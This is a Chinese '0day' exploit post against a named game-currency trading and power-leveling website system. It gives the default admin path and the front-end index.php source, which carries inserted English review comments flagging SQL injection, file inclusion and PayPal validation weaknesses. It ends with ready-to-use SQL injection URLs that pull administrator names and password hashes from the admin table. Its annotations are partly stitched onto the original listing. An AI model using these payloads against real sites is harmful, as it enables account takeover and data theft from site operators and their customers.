微微海外游戏币买卖代练系统0day
作者:小波 | 微微海外游戏币买卖代练系统 0day | 厂商:http://www.hh-e.cn/ | hhadmin/up.php 任意上传漏洞 | 默认后台地址:/hhadmin | 漏洞文件:index.php ...
作者:小波
微微海外游戏币买卖代练系统 0day
hhadmin/up.php 任意上传漏洞(注:up.php 的源码本文未给出,下面只列出了前台 index.php,上传点无法从本文代码核实)
默认后台地址:/hhadmin
漏洞文件:index.php
----------------------------------------------------------------------------------------------------------------
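<?php
// Bootstrap. inc/conn.php is not part of this listing; the code that follows
// relies on it for $db, $user_ip, $showtime, $action, msg() and checkid()
// (assumed from usage - confirm against the actual file).
// The listing as published repeated these two lines; a second "<?php" open
// tag inside an already-open PHP block is a parse error, so only one copy is
// kept here.
require("inc/conn.php");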
// --- request bootstrap ------------------------------------------------------
// NOTE(review): $db, $user_ip, $showtime, $action, msg() and checkid() are not
// defined anywhere in this listing; they presumably come from inc/conn.php
// (not shown). Every claim below about "no escaping" is about what is visible
// here - a global input filter in inc/conn.php cannot be ruled out.
// Load every g_config row into $web_config[title] = content.
$sql_config=$db->query("select title,content from g_config");
while($rs_config=$db->fetch_array($sql_config)){$web_config[$rs_config[0]]=$rs_config[1];}
// Site switched off: print the configured notice and stop.
if($web_config['webclose']!='0'){exit($web_config["webclose"]);}
// Active currency: the session value when set (the "Currency" case below
// stores $_GET["type"] into the session unmodified), else the configured one.
if(isset($_SESSION["huobi"])){$nowhuobi=$_SESSION["huobi"];}else{$nowhuobi=$web_config["webhuobi"];}
// SECURITY(review): $nowhuobi is interpolated into the query with no escaping
// visible in this file. Since it can originate from $_GET["type"] via the
// session, this is an SQL injection point (also used again in the currency
// list query in the default branch). The exit("Currency Error!") branch makes
// the row/no-row outcome of the query observable in the response.
$huobi_idx=$db->get_one("select title,stitle,huilv from g_huobi where cntitle='$nowhuobi'");
if($huobi_idx){
$huobi_title=$huobi_idx[0];
$huobi_stitle=$huobi_idx[1];
$huobi_huilv=$huobi_idx[2];
}else{unset($_SESSION['huobi']);exit("Currency Error!");}
// Visit counter: record the client IP at most once per 10-minute window.
// $user_ip and $showtime are set elsewhere (see note above).
$time=date("Y-m-d H:i:s",time()-600);
$count=$db->get_one("select * from g_visits where addtime>'$time' and ip='$user_ip'");
if(!$count){
$db->query("insert into g_visits(ip,addtime) values('$user_ip','$showtime')");
}
// The next four lines repeat the block above verbatim (looks like a
// copy/paste artifact of this listing). If the first insert succeeded the
// second lookup should find that row, so no second insert happens.
$count=$db->get_one("select * from g_visits where addtime>'$time' and ip='$user_ip'");
if(!$count){
$db->query("insert into g_visits(ip,addtime) values('$user_ip','$showtime')");
}
// --- front controller -------------------------------------------------------
// Dispatch on $action (its origin is not visible in this listing).
// The `case "x";` form with a semicolon is legal PHP, equivalent to a colon.
switch($action){
case "ad";
// Ad serving; $type selects the sub-action.
$type=isset($_GET["type"])?$_GET["type"]:'';
if($type=="flash"){require("inc/modules/flash.php");}
elseif($type=='other'){
// Render one banner as a JS document.write() snippet.
$id=(isset($_GET['id'])?$_GET['id']:'');
if(!$id){msg(0);}
// checkid() (not shown) is the only validation before $id reaches the
// unquoted `where id=$id` below; its result is re-joined with '_'.
// Whether that is sufficient depends entirely on checkid().
$id_array =checkid($id);
$id=implode('_', $id_array);
$ad_other=$db->get_one("select title,pic from g_ad where id=$id");
if(!$ad_other){msg(404);}
// $id and the stored pic path are written into the JS/HTML string without
// any output escaping.
echo "document.write(\"<a href='index.php?action=ad&type=go&id=$id' target='ad'><img src='$ad_other[1]' border='0'></a>\");";}
elseif($type=='go'){
// Click-through: count the click, then send the browser to the stored URL.
$id=(isset($_GET['id'])?$_GET['id']:'');
if(!$id){msg(0);}
$id_array =checkid($id);
$id=implode('_', $id_array);
$ad_url=$db->get_one("select url from g_ad where id=$id");
if(!$ad_url){msg(404);}
$db->query("update g_ad set click=click+1 where id=$id");
//header("Location:".$ad_url[0]);
// Redirect via inline script instead of a Location header. The url column
// is written into the script unescaped; the echo is duplicated in this
// listing.
echo "<script>location.href='{$ad_url[0]}'</script>";
echo "<script>location.href='{$ad_url[0]}'</script>";
}
else{msg(0);}
break;
case "paypal";
// PayPal IPN handler: echoes the received POST back to PayPal and expects
// the single word "VERIFIED" on a response line.
$req = 'cmd=_notify-validate';
foreach ($_POST as $key => $value) {
$value = urlencode(stripslashes($value));
$req .= "&$key=$value";
}
// NOTE(review): $header is appended to without being initialised, and the
// three header lines carry no "\r\n" terminators, no Host header and no
// blank line before the body. As written this is not a well-formed HTTP
// request, so the validation round-trip is unlikely to behave as intended.
$header .= "POST /cgi-bin/webscr HTTP/1.0";
$header .= "Content-Type: application/x-www-form-urlencoded";
$header .= "Content-Length: " . strlen($req) . "";
$fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30);
// Raw POST fields; stripslashes() above only touched the local copy in $req.
$item_name = $_POST['item_name'];
$item_number = $_POST['item_number'];
$payment_status = $_POST['payment_status'];
$payment_amount = $_POST['mc_gross'];
$payment_currency = $_POST['mc_currency'];
$txn_id = $_POST['txn_id'];
$receiver_email = $_POST['receiver_email'];
$payer_email = $_POST['payer_email'];
if (!$fp) {
// HTTP ERROR
} else {
fputs ($fp, $header . $req);
while (!feof($fp)) {
$res = fgets ($fp, 1024);
if (strcmp ($res, "VERIFIED") == 0) {
// SECURITY(review): only the VERIFIED token is checked. $receiver_email,
// $payment_status, $txn_id and the amount are read but never compared
// with the order (so a verified payment to some other account or of some
// other amount would still be accepted as far as this code goes), and the
// same order_id is applied to all four order tables. Every value below is
// straight from $_POST and interpolated into SQL without escaping.
$order_id=$item_number;
$db->query("update g_jbdd set paypal_back='$payer_email',paypal_money='$payment_amount $payment_currency' where order_id='$order_id'");
$db->query("update g_dldd set paypal_back='$payer_email',paypal_money='$payment_amount $payment_currency' where order_id='$order_id'");
$db->query("update g_zhdd set paypal_back='$payer_email',paypal_money='$payment_amount $payment_currency' where order_id='$order_id'");
$db->query("update g_zbdd set paypal_back='$payer_email',paypal_money='$payment_amount $payment_currency' where order_id='$order_id'");
}
else if (strcmp ($res, "INVALID") == 0) {
// log for manual investigation
}
}
fclose ($fp);
}
break;
case "login";
require("inc/modules/login.php");
break;
case "Currency";
// Stores the raw query-string value as the session currency. It is only
// "validated" by the g_huobi lookup at the top of the next request, after
// it has already been interpolated into that query.
$_SESSION["huobi"]=$_GET["type"];
exit("<script>history.back();</script>");
break;
default:
// Page rendering through Smarty.
// (REQUEST_URI assignment is duplicated in this listing.)
$webnowurl=$_SERVER["REQUEST_URI"];
$webnowurl=$_SERVER["REQUEST_URI"];
$webnowurl=substr($webnowurl,1);
require("inc/libs/Smarty.class.php");
$smarty=new Smarty();
$smarty->caching=$web_config['webcache'];
$smarty->compile_check = true;
$smarty->debugging = false;
// $main_page names both the module and the template; defaults to "index".
$main_page=isset($_GET['main_page'])?$_GET['main_page']:'';
if(!$main_page){$main_page='index';}
// SECURITY(review): $main_page comes from the query string and goes into
// require() after only a file_exists() check. Nothing here strips "../", so
// any *.php file reachable by relative path could be included. Note the
// order: the include runs first; the template check on the next line only
// aborts afterwards.
// The published exp targets `gid` inside inc/modules/buyitems.php, which is
// pulled in by this require() and is not part of this listing.
if(file_exists("inc/modules/$main_page.php")){require("inc/modules/$main_page.php");}
if(!file_exists("templates/".$web_config['webstyle']."/$main_page.php")){msg(404);}
// Other currencies for the switcher; $nowhuobi interpolated unescaped again.
$sql_huobi=$db->query("select cntitle from g_huobi where cntitle<>'$nowhuobi'");
while($rs_huobi=$db->fetch_array($sql_huobi)){
$huobilist[]=array("cntitle"=>$rs_huobi[0]);
}
$smarty->assign('webname',$web_config['webname']);
$smarty->assign("webhtml",$web_config['webhtml']);
$smarty->assign('webkeywords',$web_config['keywords']);
$smarty->assign('webdescription',$web_config['description']);
$smarty->assign('nowhuobi',$nowhuobi);
$smarty->assign("huobi",$huobilist);
$smarty->assign("huobi_title",$huobi_title);
$smarty->assign("huobi_stitle",$huobi_stitle);
$smarty->assign("huobi_huilv",$huobi_huilv);
// REQUEST_URI is handed to the template as-is; whether it is escaped on
// output depends on the template, which is not shown here.
$smarty->assign("webnowurl",$webnowurl);
$smarty->display($web_config['webstyle']."/$main_page.php");
$_SESSION['nowurl']=$_SERVER['REQUEST_URI'];
break;
}
$db->close();
?>
-----------------------------------------------------------------------------------------------------------------
exp
http://site.com/index.php?main_page=buyitems&gid=-10 union select 1,admin_name from yu_admin/*xiaobo
-----------------------------------------------------------------------------------------------------------------
exp(注:buyitems 模块及其 gid 参数不在上面的 index.php 代码中,注入点位于由 main_page 引入的 inc/modules/buyitems.php;另外上面代码使用的是 g_ 表前缀,而 payload 中的表名为 yu_admin,实际利用时需按目标环境核对表前缀)
http://site.com/index.php?main_page=buyitems&gid=-10 union select 1,admin_name from yu_admin/*xiaobo
http://site.com/index.php?main_page=buyitems&gid=-10 union select 1,admin_pwd from yu_admin/*xiaobo
